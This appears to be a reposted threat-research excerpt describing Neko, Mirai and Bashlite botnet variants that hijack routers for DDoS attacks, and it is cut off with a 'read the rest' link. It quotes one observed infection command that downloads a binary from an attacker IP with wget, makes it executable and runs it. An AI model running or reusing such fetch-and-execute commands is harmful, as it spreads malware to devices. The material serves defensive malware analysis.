By Augusto Remillano II and Jakub Urbanec
Within a span of three weeks, our telemetry uncovered three notable malware variants of Neko, Mirai, and Bashlite. On July 22, 2019, we saw and started analyzing a Neko botnet sample, then observed another sample with additional exploits the following week. A Mirai variant that calls itself “Asher” surfaced on July 30, then a Bashlite variant called “Ayedz” the following week. These malware variants enlist infected routers to botnets that are capable of launching distributed denial of service (DDoS) attacks.
Neko
On July 22, our honeypots detected a botnet sample, x86.neko (detected by Trend Micro as Backdoor.Linux.NEKO.AB), that brute-forces weak credentials. It then issues the following commands:
“cd /tmp/; wget hxxp://185.244.25.200/bins/x86.neko; chmod 777 x86.neko; ./x86.neko”
Our research indicates that this botnet has versions for various processor architectures.
Upon analysis, we discovered that the Neko botnet is capable of executing several backdoor commands: it can execute shell commands as well as launch user datagram protocol or UDP and UPD-HEX flood attacks, inundating a router’s ability to properly process and respond to information.
It is also capable of killing processes (the “killer” function is found in its body). Neko also holds within it an extensive kill list of other malware-related processes that it will terminate.
Further examination of the Neko botnet code shows that it comes with scanners that are capable of looking for multiple exploits that would allow the malware to propagate itself to other vulnerable devices:
Aside from the abovementioned exploits, we observe ..
Support the originator by clicking the read the rest link below.
